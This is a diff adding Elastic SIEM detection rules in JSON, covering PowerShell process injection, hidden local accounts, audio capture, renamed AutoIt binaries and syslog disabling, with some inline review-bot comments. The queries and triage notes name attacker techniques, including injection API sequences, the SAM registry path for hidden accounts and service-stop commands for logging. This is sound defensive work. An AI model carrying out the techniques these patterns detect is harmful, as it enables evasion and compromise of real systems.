concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 
"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_110.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_110.json new file mode 100644 index 00000000000..ea709c37ef2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_110.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of these functions." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Process Injection via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Potential Process Injection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way, like the execution of inline C# code, PSReflect, Get-ProcAddress, etc.\n\nRed Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject payloads directly into the memory without touching the disk to circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n- Check if the injected code can be retrieved (hardcoded in the script or on command line logs).\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or\n LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and\n (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or\n SuspendThread or ResumeThread or GetDelegateForFunctionPointer)\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\SenseCM\")\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1", + "https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"2e29e96a-b67c-455a-afe4-de6183431d0d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.001", + "name": "Dynamic-link Library Injection", + "reference": "https://attack.mitre.org/techniques/T1055/001/" + }, + { + "id": "T1055.002", + "name": "Portable Executable Injection", + "reference": "https://attack.mitre.org/techniques/T1055/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "query", + "version": 110 + }, + "id": "2e29e96a-b67c-455a-afe4-de6183431d0d_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109.json new file mode 100644 index 00000000000..f8b4bdaefdd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden local user account by appending the dollar sign to the account name. This is sometimes done by attackers to increase access to a system and avoid appearing in the results of accounts listing using the net users command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of a Hidden Local User Account", + "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and bypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\"\n)\n", + "references": [ + "http://web.archive.org/web/20230329153858/https://blog.menasec.net/2019/02/threat-hunting-6-hiding-in-plain-sights_8.html", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/tree/master/2020/2020.12.15.Lazarus_Campaign" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline 
refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110.json new file mode 100644 index 00000000000..351557bbd52 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110.json 
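Review bot: `query` carries no `event.type` or `event.action` constraint, so it fires on any registry event under `...\\Users\\Names\\*$\\` — modification or deletion of an existing `$`-suffixed key as well as its creation — while `name` and `description` promise creation only. Either add the creation condition used by the Defend and Sysmon registry mappings (confirm the exact value against both data sources) or reword `description` to say the rule alerts on any registry activity on such keys; the version 110 copy of this rule in the next hunk has the same gap. Separately, `note` reads `Benign true positive (B-TPs)` where the other rules in this commit spell it `Benign true positives (B-TPs)`.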
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden local user account by appending the dollar sign to the account name. This is sometimes done by attackers to increase access to a system and avoid appearing in the results of accounts listing using the net users command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of a Hidden Local User Account", + "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and bypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\"\n)\n", + "references": [ + "http://web.archive.org/web/20230329153858/https://blog.menasec.net/2019/02/threat-hunting-6-hiding-in-plain-sights_8.html", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/tree/master/2020/2020.12.15.Lazarus_Campaign" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline 
refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_110.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_110.json new file mode 100644 index 00000000000..37746c695e1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_110.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Audio Capture Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Audio Capture Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices connected to the victim's computer.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the recorded data locally and determine if anything was recorded.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users should not need scripts to capture audio, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Get-MicrophoneAudio\" or\n \"WindowsAudioDevice-Powershell-Cmdlet\" or\n (waveInGetNumDevs and mciSendStringA)\n )\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", 
+ "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1123", + "name": "Audio Capture", + "reference": "https://attack.mitre.org/techniques/T1123/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_109.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_109.json new file mode 100644 index 00000000000..5ae98af6901 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_109.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Disable Syslog Service", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n ( (process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))\n ) and process.args in (\"syslog\", \"rsyslog\", \"syslog-ng\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2f8a1226-5720-437d-9c20-e0029deb6194", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2f8a1226-5720-437d-9c20-e0029deb6194_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_1.json b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_1.json new file mode 100644 index 00000000000..145fe90ac4a --- /dev/null 
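Review bot: `description` contains a duplicated phrase, `in an attempt to an attempt to disrupt event logging`; it should read `... in an attempt to disrupt event logging and evade detection by security controls.` Separately, `process.args in ("syslog", "rsyslog", "syslog-ng")` matches only the bare unit names, so the `.service`-suffixed form that `systemctl` also accepts would not be covered; if the data sources report `process.args` verbatim, a wildcard comparison such as `process.args : ("syslog*", "rsyslog*", "syslog-ng*")` (the `:` pattern form is already used by other rules in this commit) would close that gap — confirm against the Defend and Auditbeat normalization before changing the operator.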
+++ b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_1.json 
